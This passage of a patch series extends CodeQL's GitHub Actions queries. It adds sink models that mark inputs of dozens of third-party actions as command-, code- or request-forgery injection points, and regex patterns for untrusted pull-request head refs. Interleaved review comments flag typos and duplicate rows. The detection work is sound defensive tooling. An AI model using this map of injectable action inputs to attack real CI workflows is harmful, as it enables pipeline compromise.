sinkModel + data: + - ["msys2/setup-msys2", "*", "input.install", "command-injection"] + - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection"] \ No newline at end of file 
diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml new file mode 100644 index 000000000000..a18319954e3b --- /dev/null +++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection"] + - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index 3db3e9cf66c0..f46c40a8f9cb 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -4,3 +4,9 @@ extensions: extensible: summaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection"] + - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml new file mode 100644 index 000000000000..219de80c39e2 --- /dev/null +++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection"] diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml new file mode 100644 index 000000000000..dc3c2739e87f --- /dev/null +++ b/ql/lib/ext/nanasess_setup-php.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nanasess/setup-php", "*", "input.php-version", "command-injection"] 
diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml new file mode 100644 index 000000000000..30679750f131 --- /dev/null +++ b/ql/lib/ext/nick-fields_retry.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection"] + - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection"] + - ["nick-fields/retry", "*", "input.command", "command-injection"] diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml new file mode 100644 index 000000000000..c600e7a93b64 --- /dev/null +++ b/ql/lib/ext/octokit_graphql-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["octokit/graphql-action", "*", "input.query", "request-forgery"] diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml new file mode 100644 index 000000000000..ed9088c9f568 --- /dev/null +++ b/ql/lib/ext/octokit_request-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["octokit/request-action", "*", "input.route", "request-forgery"] diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml new file mode 100644 index 000000000000..988c3d5e674f --- /dev/null +++ b/ql/lib/ext/olafurpg_setup-scala.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection"] diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml new file mode 100644 index 000000000000..91a3382348ca --- /dev/null +++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection"] diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml new file mode 100644 index 000000000000..d9d15dc94b27 --- /dev/null +++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection"] diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml new file mode 100644 index 000000000000..6bc0467692d2 --- /dev/null +++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection"] + - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection"] + - ["plasmicapp/plasmic-action", "*", "input.branch", "command-injection"] diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml new file mode 100644 index 000000000000..62dea47d8184 --- /dev/null +++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection"] + - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection"] diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml new file mode 100644 index 000000000000..525d0199859d --- /dev/null +++ b/ql/lib/ext/py-actions_flake8.model.yml 
@@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["py-actions/flake8", "*", "input.flake8-version", "command-injection"] + - ["py-actions/flake8", "*", "input.plugins", "command-injection"] + - ["py-actions/flake8", "*", "input.path", "command-injection"] + - ["py-actions/flake8", "*", "input.ignore", "command-injection"] + - ["py-actions/flake8", "*", "input.exclude", "command-injection"] + - ["py-actions/flake8", "*", "input.max-line-length", "command-injection"] + - ["py-actions/flake8", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml new file mode 100644 index 000000000000..5aac0f894327 --- /dev/null +++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["py-actions/py-dependency-install", "*", "input.path", "command-injection"] diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml new file mode 100644 index 000000000000..d32c6509ad7e --- /dev/null +++ b/ql/lib/ext/pyo3_maturin-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection"] + - ["pyo3/maturin-action", "*", "input.target", "command-injection"] + - ["pyo3/maturin-action", "*", "input.command", "command-injection"] + - ["pyo3/maturin-action", "*", "input.manylinux", "command-injection"] diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml new file mode 100644 index 000000000000..c4ea326ecef0 --- /dev/null +++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml 
@@ -0,0 +1,24 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.arch", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.profile", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size'", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.cores", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ram-size", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.heap-size", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.disk-size", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.emulator-options", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.emulator-build", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.cmake", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml
new file mode 100644
index 000000000000..7213a39f992b
--- /dev/null
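Review bot: The row for `input.sdcard-path-or-size'` carries a stray trailing apostrophe inside the quoted name, so that sink will never match the action's real `sdcard-path-or-size` input and tainted flows into it go unreported; the same typo appears in the tripss hunk on L2253 (`input.tag-prefix'`). The fix is the one row `- ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size", "command-injection"]`. In the same hunk `input.ndk` is listed seven times while `input.cmake` appears once; the duplicates are harmless to matching but look like copy-paste residue, so presumably other inputs were meant and the six repeated `ndk` rows should be replaced or dropped.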
+++ b/ql/lib/ext/reggionick_s3-deploy.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.dist-id", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.invalidation", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.delete-removed", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.cacheControl", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.cache", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.files-to-include", "command-injection"] diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml new file mode 100644 index 000000000000..3207c6d75211 --- /dev/null +++ b/ql/lib/ext/renovatebot_github-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection"] + - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection"] + - ["renovatebot/github-action", "*", "input.docker-cmd-file", "command-injection"] + - ["renovatebot/github-action", "*", "input.docker-user", "command-injection"] + - ["renovatebot/github-action", "*", "input.docker-volumes", "command-injection"] diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml new file mode 100644 index 000000000000..d00d78bcba8a --- /dev/null +++ b/ql/lib/ext/roots_issue-closer-action.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection"] + - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection"] diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml new file mode 100644 index 000000000000..e2813105bdc9 --- /dev/null +++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index 0190ffd9ad72..d6ba27a50798 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -4,3 +4,8 @@ extensions: extensible: summaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 87610c434403..413f4f3058bc 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -4,3 +4,8 @@ extensions: extensible: summaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection"] 
diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml new file mode 100644 index 000000000000..42361b203e08 --- /dev/null +++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml new file mode 100644 index 000000000000..474b36186b09 --- /dev/null +++ b/ql/lib/ext/snow-actions_eclint.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["snow-actions/eclint", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml new file mode 100644 index 000000000000..73b93dbb88af --- /dev/null +++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.command", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.args", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.version", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml new file mode 100644 index 000000000000..4138b97f0fb2 --- /dev/null +++ b/ql/lib/ext/step-security_harden-runner.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection"] diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml new file mode 100644 index 000000000000..1bcbac476a80 --- /dev/null +++ b/ql/lib/ext/tibdex_backport.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tibdex/backport", "*", "input.body_template", "code-injection"] + - ["tibdex/backport", "*", "input.head_template", "code-injection"] + - ["tibdex/backport", "*", "input.labels_template", "code-injection"] + - ["tibdex/backport", "*", "input.title_template", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index 21a0b479ef55..7c681d8a64b3 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -19,4 +19,4 @@ extensions: - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml new file mode 100644 index 000000000000..3072c6f54fd3 --- /dev/null +++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml 
@@ -0,0 +1,15 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-user-email", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-url", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.github-token", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-pull-method", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.fallback-version", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-message", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-branch", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.tag-prefix'", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml
new file mode 100644
index 000000000000..5fe53ea3d079
--- /dev/null
+++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection"]
+ - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection"]
diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml
new file mode 100644
index 000000000000..5e87f6c3b941
--- /dev/null
+++ b/ql/lib/ext/veracode_veracode-sca.model.yml
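Review bot: The new tripss model file is committed without a trailing newline (`\ No newline at end of file`), unlike the tryghost and veracode files added right after it, and the same is true of several other new model files on this page (gr2m, ilammy msvc-dev-cmd, imjohnbo, lucasbento, mr-smithers-excellent, msys2, skitionek, stackhawk, tibdex, zaproxy action-baseline), while the tj-actions hunk on L2252 even strips an existing one. Ending every generated model file with a newline keeps the set consistent and avoids spurious one-line diffs the next time a row is appended. If these files are produced by a script, the fix belongs there rather than in each file.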
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["veracode/veracode-sca", "*", "input.url", "command-injection"]
+ - ["veracode/veracode-sca", "*", "input.path", "command-injection"]
+ - ["veracode/veracode-sca", "*", "input.skip-collectors", "command-injection"]
+ - ["veracode/veracode-sca", "*", "input.url", "command-injection"]
diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml
new file mode 100644
index 000000000000..dbe5d2d542dd
--- /dev/null
+++ b/ql/lib/ext/wearerequired_lint-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["wearerequired/lint-action", "*", "input.git_name", "command-injection"]
+ - ["wearerequired/lint-action", "*", "input.git_email", "command-injection"]
+ - ["wearerequired/lint-action", "*", "input.commit_message", "command-injection"]
diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml
new file mode 100644
index 000000000000..9ecbdb6329f5
--- /dev/null
+++ b/ql/lib/ext/webfactory_ssh-agent.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection"]
+ - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection"]
+ - ["webfactory/ssh-agent", "*", "input.git-cmd", "command-injection"]
diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml
new file mode 100644
index 000000000000..10920eb6bf59
--- /dev/null
+++ b/ql/lib/ext/zaproxy_action-baseline.model.yml
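Review bot: `input.url` is listed twice in the veracode hunk (first and last data rows); the duplicate does not change matching but suggests a different input was intended for the last row, so either drop `- ["veracode/veracode-sca", "*", "input.url", "command-injection"]` or replace it with the input that was meant. A quick uniqueness check over each file's `data` rows (action, version, input, kind) when these models are generated would have caught this as well as the repeated `input.ndk` rows in the reactivecircus hunk on L2248.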
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.target", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.rules_file_name", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.cmd_options", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml new file mode 100644 index 000000000000..a1d49af08456 --- /dev/null +++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.target", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.rules_file_name", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.cmd_options", "command-injection"] diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index d59cc07cad26..33d6260203ef 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -20,7 +20,8 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") + externallyDefinedSink(this, + ["expression-injection", "command-injection", "request-forgery", "code-injection"]) } } From fe1bf58ae537271980678fc34b9237e5a27fc4a9 Mon Sep 17 00:00:00 2001 
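Review bot: Widening `externallyDefinedSink` to `"command-injection"`, `"request-forgery"` and `"code-injection"` makes every externally modelled sink of those kinds surface as an expression-injection result, and nothing in the hunk records why the kinds are folded together; the query's alert message and metadata live outside this hunk, so a reader cannot tell from here whether they still describe these sinks accurately. A comment above the call, e.g. `// Externally modelled sinks of every injection kind are reported by this query until kind-specific queries exist`, or a named helper such as `private string sinkKind() { result = ["expression-injection", "command-injection", "request-forgery", "code-injection"] }` would make the intent explicit and reusable. The `ExpressionInjectionSink` class is fully inside the hunk.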
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 09:22:05 +0100 Subject: [PATCH 097/707] Apply suggestions from code review MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Jaroslav LobaÄevski --- ql/src/Security/CWE-829/UntrustedCheckout.ql | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index c9ad93d18b20..9ea69477675a 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -37,6 +37,7 @@ predicate containsHeadRef(string s) { Utils::normalizeExpr(s) .regexpFind([ "\\bgithub\\.event\\.number\\b", // The pull request number. + "\\bgithub\\.event\\.issue\\.number\\b", // The pull request number on issue_comment. "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", // The ref name of head. "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", // The commit SHA of head. "\\bgithub\\.event\\.pull_request\\.id\\b", // The pull request ID. @@ -82,7 +83,7 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { from Workflow w, PRHeadCheckoutStep checkout where - w.hasTriggerEvent(["pull_request_target", "issue_comment", "workflow_run"]) and + w.hasTriggerEvent(["pull_request_target", "issue_comment", "pull_request_review_comment", "pull_request_review", "workflow_run", "check_run", "check_suite", "workflow_call"]) and w.getAJob().(LocalJob).getAStep() = checkout and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check From aa37339deb22e8ac1d24e7305659342be3bac1a8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 09:22:40 +0100 Subject: [PATCH 098/707] Apply suggestions from code review --- ql/lib/codeql/actions/Ast.qll | 1 - ql/lib/codeql/actions/ast/internal/Ast.qll | 2 +- 2 files changed, 1 insertion(+), 2 deletions(-) 
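Review bot: The widened trigger list in the second hunk adds `"workflow_call"`, which, as far as this hunk shows, flags a reusable workflow that checks out a head ref regardless of the event its caller was triggered by, so callers running on a plain `pull_request` would be reported too. If that is meant as a conservative heuristic, a trailing comment on that element such as `// reusable workflows: caller trigger is unknown, report conservatively` would record the decision; otherwise the caller's trigger needs checking. The `where` clause continues past the end of the hunk.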
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index 143e89512fe5..19d1924731ab 100644
--- a/ql/lib/codeql/actions/Ast.qll
+++ b/ql/lib/codeql/actions/Ast.qll
@@ -5,7 +5,6 @@ module Utils {
 bindingset[expr]
 string normalizeExpr(string expr) {
 result =
- //[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]
 expr.regexpReplaceAll("\\['([a-zA-Z0-9_\\*\\-]+)'\\]", ".$1")
 .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1")
 .regexpReplaceAll("\\s*\\.\\s*", ".")
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
index b05dd852dbfe..9a97a1c45b43 100644
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
@@ -47,7 +47,7 @@ private newtype TAstNode =
 )
 )
 or
- // if's conditions do not need to be delimted with ${{}}
+ // `if`'s conditions do not need to be delimted with ${{}}
 exists(YamlMapping m |
 m.maps(key, value) and
 key.(YamlScalar).getValue() = ["if"] and
From e726f9fff12fb35b5f0b1287aa87e0e1e5fb7136 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 14 Mar 2024 09:24:32 +0100
Subject: [PATCH 099/707] Apply suggestions from code review
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Co-authored-by: Jaroslav LobaÄevski
---
 ql/src/Security/CWE-829/UntrustedCheckout.ql | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)
diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql
index 9ea69477675a..4a0a4b6ade6c 100644
--- a/ql/src/Security/CWE-829/UntrustedCheckout.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql
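Review bot: The rewritten comment in the internal/Ast.qll hunk still carries the typo `delimted`; since the line is being touched anyway, make it `// \`if\`'s conditions do not need to be delimited with ${{}}`. The enclosing newtype branch starts and ends outside the hunk.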
@@ -48,6 +48,26 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", // The SHA of the head commit. "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", // The SHA of the head commit. "\\benv\\.GITHUB_HEAD_REF\\b", + + "\\bgithub\\.event\\.check_suite\\.after\\b", + "\\bgithub\\.event\\.check_suite\\.head_sha\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", + + "\\bgithub\\.event\\.check_run\\.check_suite\\.after\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.head_sha\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + 